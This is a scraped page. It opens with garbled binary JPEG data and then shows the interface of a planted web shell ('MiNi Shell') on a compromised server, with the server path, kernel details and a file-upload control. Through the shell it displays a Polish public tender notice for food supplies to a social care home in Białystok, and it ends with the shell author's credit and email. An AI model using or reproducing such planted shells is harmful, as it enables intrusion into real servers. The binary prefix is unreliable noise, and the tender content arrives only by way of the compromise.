JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221216/0049991901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa produktów spożywczych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dom Pomocy Społecznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000304674</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Świerkowa 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białystok</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">15-328</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@dps.bialystok.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dps.bialystok.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka samorządowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Działalność społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa produktów spożywczych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a5d42e7e-7d13-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00499919</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00011901/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.5 Dostawa artykułów żywnościowych na 2023 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.dps.bialystok.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">sekretariat@dps.bialystok.pl, https://miniportal.uzp.gov.pl, e-Puap /dpsbialystok/SkrytkaESP, https://dpsbip.um.bialystok.pl/zamowienia_publiczne/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">sekretariat@dps.bialystok.pl, https://miniportal.uzp.gov.pl, e-Puap /dpsbialystok/SkrytkaESP, https://dpsbip.um.bialystok.pl/zamowienia_publiczne/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DGO/341p-11/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Drożdże piekarnicze	18	kg<br/>2.	Jogurt kremowy z owocami 122g Fantazja-różne smaki	195	szt.<br/>3.	Jogurt naturalny 150 g	4000	szt.<br/>4.	Jogurt naturalny 350 g	60	szt.<br/>5.	Jogurt owocowy 150 g rózne smaki	1500	szt.<br/>6.	Jogurt pitny naturalny 250g	60	szt.<br/>7.	Jogurt pitny smakowy 250g różne smaki	500	szt.<br/>8.	Jogurt pitny smakowy różne smaki b/ cukru 250g	200	szt.<br/>9.	Kefir 1,8%-3% tłuszczu 400 g	100	szt.<br/>10.	Margaryna zwykła 250 g 60% tłuszczu	350	szt.<br/>11.	Masło roślinne 250g	5	szt.<br/>12.	Masło śmietankowe stołowe 200 g 82% tłuszczu	5150	szt.<br/>13.	Mleko 2% luz, opakowanie 5 l	10000	l<br/>14.	Ser Favita 12% tł 270g	5	szt.<br/>15.	Ser Mozzarella Classic 125 g	5	szt.<br/>16.	Ser pleśniowy naturalny 125g	5	szt.<br/>17.	Ser żółty typu holenderskiego	75	kg<br/>18.	Ser żółty lekki 16% tł. W suchej masie	15	kg<br/>19.	Ser żółty rolada ustrzycka	65	kg<br/>20.	Ser żółty typu salami	75	kg<br/>21.	Ser żółty typu szwajcarskiego	65	kg<br/>22.	Serek homogenizowany 150 g - różne smaki	525	szt.<br/>23.	Serek homogenizowany bez laktozy naturalny 150 g	5	szt.<br/>24.	Serek kanapkowy twarogowy 150 g - różne smaki	950	szt.<br/>25.	Serek mascarpone 250 g	2	szt.<br/>26.	Serek mazowiecki topiony kremowy 100g - kiełbaska	300	szt.<br/>27.	Serek topiony 100 g różne smaki	850	szt.<br/>28.	Serek topiony 140 g krążki mix smaków	500	szt.<br/>29.	Serek topiony plastry 130 g - różne smaki	250	szt.<br/>30.	Serek twarogowy ziołowy/ naturalny 150g np.. Deliser plastry	165	szt.<br/>31.	Serek wiejski lekki 150 g	125	szt.<br/>32.	Serek wiejski smakowy 150 g	250	szt.<br/>33.	Śmietana 18% 400 g	1600	szt.<br/>34.	Śmietanka UHT 30% tł 330 ml	2	szt.<br/>35.	Twaróg capri	125	kg<br/>36.	Twaróg półtłusty, krajanka	650	kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Ananas puszka plastry 580g	15	szt.<br/>2.	Baton bez glutenowy Raw 50g	2	szt.<br/>3.	Baton owocowy bez cukry Raw 35g	1000	szt.<br/>4.	Bazylia10g	15	szt.<br/>5.	Beskidzkie mini krakersy 100g	750	szt.<br/>6.	Biszkopty 120g	850	szt.<br/>7.	Biszkopty b/ cukru 100g np.. Mamut	275	szt.<br/>8.	Biszkopty bez glutenowe 85 g	2	szt.<br/>9.	Brzoskwinia w syropie puszka 850g	5	szt.<br/>10.	Budyń bez cukru 1 kg różne smaki 15	kg<br/>11.	Bułka tarta 500g	140	kg<br/>12.	Bułka tarta bez glutenowa 500g np. Belviten	1	kg<br/>13.	Chrupki kukurydziane 100g typu Flips	75	szt.<br/>14.	Chrupki kukurydziane 70 g truskawkowe, czekoladowe	225	szt.<br/>15.	Chrupki ryżowe 75g	5	szt.<br/>16.	Chrzan delikatesowy Mosso 290g 300	szt.<br/>17.	Ciasteczka maślane b/cukru 125 g np. Jutrzenka	50	szt.<br/>18.	Ciasteczka owsiane bez cukru 150g np.. Ania 50	szt.<br/>19.	Ciasteczka śniadaniowe b/ cukru Sante 30g – różne 950	szt.<br/>20.	Ciastka korzenne lub miodowe lub pierniki toruńskie z polewą lub nadziewane	5	kg<br/>21.	Ciastka kruche z marmoladą, z polewą lukrowaną lub polewą czekoladową	5	kg<br/>22.	Ciastka maślane niskobiałkowe 150g	2	szt.<br/>23.	Ciastka w polewie czekoladowej biszkoptowe lub herbatniki	5	kg<br/>24.	Cieciorka konserwowa 400g	5	szt.<br/>25.	Cukier 1 kg	1950	kg<br/>26.	Cukier puder 500g	5	kg<br/>27.	Cukier waniliowy ok.30g	110	szt.<br/>28.	Cynamon 20g	30	szt.<br/>29.	Czosnek granulowany 20g	175	szt.<br/>30.	Ćwikła z chrzanem 290g Laskol 275	szt.<br/>31.	Dżem bez cukru na fruktozie(dla diabetyków) 240g 150	szt.<br/>32.	Dżem Łowicz 280g truskawa, brzoskwinia, wisnia, porzeczka	190	szt.<br/>33.	Dżem owocowy na 1 osobę 25g 1200	szt.<br/>34.	Fasola biała 400g drobna,średnia	60	kg<br/>35.	Fasola biała konserwowa 400 g	10	szt.<br/>36.	Fasola czerwona konserwowa 400g	85	szt.<br/>37.	Galaretka owocowa różne smaki 75g	675	szt.<br/>38.	Galatetka owocowa bez cukru 75g	175	szt.<br/>39.	Gałka muszkatełowa mielona10g	5	szt.<br/>40.	Gofry 250g(6 szt) np. Dane Cake	50	szt.<br/>41.	Gofry naturalne b/ cukru 65 g np.. Ania	25	szt.<br/>42.	Goździki10g	15	szt.<br/>43.	Groch połówki 400g	60	kg<br/>44.	Groszek konserwowy Kotlin 400g	225	szt.<br/>45.	Grześki truskawkowe,śmietankowe 26g bez polewy	700	szt.<br/>46.	Herbata czarna liściasta 100 g-Assam	600	szt.<br/>47.	Herbata czarna liściasta 100g Lipton	2	szt.<br/>48.	Herbata owocowa luzem dzika róza – malina 100g	25	op.<br/>49.	Herbatniki 50g typu Krakus, Szkolne	1000	szt.<br/>50.	Herbatniki Be-be 14g	950	szt.<br/>51.	Herbatniki bez cukru 120g	200	szt.<br/>52.	Kakao 100g Wedel	55	szt.<br/>53.	Kasza gryczana prażona 1 kg	85	kg<br/>54.	Kasza jaglana	17	kg<br/>55.	Kasza jęczmienna 1 kg	80	kg<br/>56.	Kasza kus- kus	70	kg<br/>57.	Kasza manna 1 kg	175	kg<br/>58.	Kasza pęczak 1kg	100	kg<br/>59.	Kaszka ryżowa bez mleczna, kleik bez cukru160g	15	szt.<br/>60.	Kawa Inka 150g	450	szt.<br/>61.	Ketchup 500g łagodny Pudliszki	200	szt.<br/>62.	Kisiel 1 kg bez cukru różne smaki	50	kg<br/>63.	Koncentrat barszcz czerwony Krakus 300ml	30	szt.<br/>64.	Koncentrat pomidorowy 30% 200g Dawton	25	szt.<br/>65.	Koncentrat pomidorowy 30% 900g MK	150	szt.<br/>66.	Koncentrat żurek Krakus 300ml	15	szt.<br/>67.	Kostki rosołowe 60g drobiowe,	900	szt.<br/>68.	Kostki rosołowe wołowe60g	50	szt.<br/>69.	Kukurydza konserwowa Dafton 400g	175	szt.<br/>70.	Kwasek cytrynowy 20g	300	szt.<br/>71.	Liść laurowy 10g	180	szt.<br/>72.	Lu Petitki Lubisie różne 30g	450	szt.<br/>73.	Majeranek 10g	180	szt.<br/>74.	Majonez minimum 60% tłuszczu 900ml Mosso	180	szt.<br/>75.	Makaron 1 kg &#34;Polskie Młyny&#34; 100% przenicy durum	250	kg<br/>76.	Makaron 1 kg &#34;Polskie Młyny&#34; żytni	15	kg<br/>77.	Makaron 1kg Lubella 100% pszenicy durum różny	225	kg<br/>78.	Makaron bez glutenowy różny	2	kg<br/>79.	Mamutki – ciastka biszkoptowe b/cukru 20g	50	szt.<br/>80.	Marmolada wieloowocowa ,tradycyjna1000g	1	kg<br/>81.	Masa kajmakowa 2	szt.<br/>82.	Masa makowa z bakaliami 800-1000g	6	szt.<br/>83.	Mąka 1 kg typ 450 tortowa	850	kg<br/>84.	Mąka bez glutenowa uniwersalna	1	kg<br/>85.	Mąka kukurydziana	1	kg<br/>86.	Mąka ryżowa	1	kg<br/>87.	Mąka ziemniaczana 1 kg	20	kg<br/>88.	Mieszanka czekoladowa- cukierki w polewie z zawartością 22% czekolady	5	kg<br/>89.	Mieszanka owocowa cukierki nadziewane	5	kg<br/>90.	Mini wafelki 150g b/ cukru	240	szt.<br/>91.	Miód naturalny 1 kg	15	kg<br/>92.	Miód naturalny pszczeli na 1 osobę 25g	1400	szt.<br/>93.	Morele suszone 200g	5	szt.<br/>94.	Musztarda 210 g chrzanowa, miodowa, stołowa Rolewski-łagodna	350	szt.<br/>95.	Ocet 10% spirytusowy 0,5 l	50	szt.<br/>96.	Ogórki korniszony w słoikach 0,9 l.	350	szt.<br/>97.	Olej rzepakowy 100% 1L- rafinowany	925	szt.<br/>98.	Orzechy włoskie 100g	5	szt.<br/>99.	Paluszki słone 70g	90	szt.<br/>100.	Papryka konserwowa 720g	200	szt.<br/>101.	Papryka ostra20g	20	szt.<br/>102.	Papryka słodka20g	75	szt.<br/>103.	Pasztet białostocki z drobiem 100g	100	szt.<br/>104.	Pestki słonecznika 200 szt	5	szt.<br/>105.	Pieczywa chrupki Sonko bez cukru170g-różne	20	szt.<br/>106.	Pieprz cytrynowy mielony 20g	25	szt.<br/>107.	Pieprz naturalny czarny 20g	185	szt.<br/>108.	Pieprz ziołowy 20 g	275	szt.<br/>109.	Płatki jęczmienne błyskawiczne 500g	150	kg<br/>110.	Płatki kukurydziane bez glutenowe 500g Nestle	5	szt.<br/>111.	Płatki migdałów 100g	2	szt.<br/>112.	Płatki owsiane bez glutenowe 500g	1	kg<br/>113.	Płatki owsiane zwykłe 500g	175	kg<br/>114.	Płatki ryżowe 400g	150	kg<br/>115.	Precelki Lajkonik 130g	25	szt.<br/>116.	Proszek do pieczenia 30g	12	szt.<br/>117.	Przyprawa curry 20g	15	szt.<br/>118.	Przyprawa do flaków 20g	25	szt.<br/>119.	Przyprawa sucha Kucharek 1kg 100	kg<br/>120.	Przyprawa w płynie 1LWiniary	35	szt.<br/>121.	Rodzynki 200g	12	kg<br/>122.	Ryż biały długoziarnisty 1 kg	175	kg<br/>123.	Słodzik Stewia – 200 tabletek	15	szt.<br/>124.	Słomka ptysiowa b/ cukru 30g	50	szt.<br/>125.	Soczek owocowo-warzywny300g bez cukru	600	szt.<br/>126.	Soczek owocowy 300g bez cukru 600	szt.<br/>127.	Soczek owocowy bez cukru 200 ml	1600	szt.<br/>128.	Soczek warzywny pomidorowy bez cukru 330g	1250	szt.<br/>129.	Soczek warzywny z buraka 330g bez cukru	1300	szt.<br/>130.	Soczewica czerwona 350g	60	kg<br/>131.	Soda oczyszczona do celów spożywczych 50g	5	szt.<br/>132.	Sos czosnkowy np.Mosso 230 ml	175	szt.<br/>133.	Sos ogrodowy 700g Knor	5	szt.<br/>134.	Sos tatarski np.Mosso 240 ml	200	szt.<br/>135.	Sól 1kg różna	200	kg<br/>136.	Syrop owocowy 420ml Paola, Gellwe, Łowicz – porzeczka,wiśnia, malina,truskawka	470	szt.<br/>137.	Szczaw konserwowy 280g.Laskol	155	szt.<br/>138.	Szynka wieprzowa konserwowa -konserwa 110g	100	szt.<br/>139.	Śliwka kalifornijska 200g	5	szt.<br/>140.	Śliwka w czekoladzie	2	kg<br/>141.	Wafelek waniliowy b/ c 30 g Wedel	50	szt.<br/>142.	Wafle b/ cukru 180g	100	szt.<br/>143.	Wafle bez cukru listki nyskie 38g	135	szt.<br/>144.	Wafle ryżowe130g typu Sonko	5	szt.<br/>145.	Wafle śmietankowe,orzechowe ,o smaku chałwy,z nadzieniem owocowym lub kisielu	5	kg<br/>146.	Ziele angielskie 15g	175	szt.<br/>147.	Zioła prowansalskie 10g	5	szt.<br/>148.	Zupa ogonowa 1 kg Knorr	15	szt.<br/>149.	Żelatyna spożywcza zwykła wp. 50g	90	szt.<br/>150.	Żurawina suszona 200g	5	szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-23 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Dom Pomocy Społecznej, ul. Świerkowa 9</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-23 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com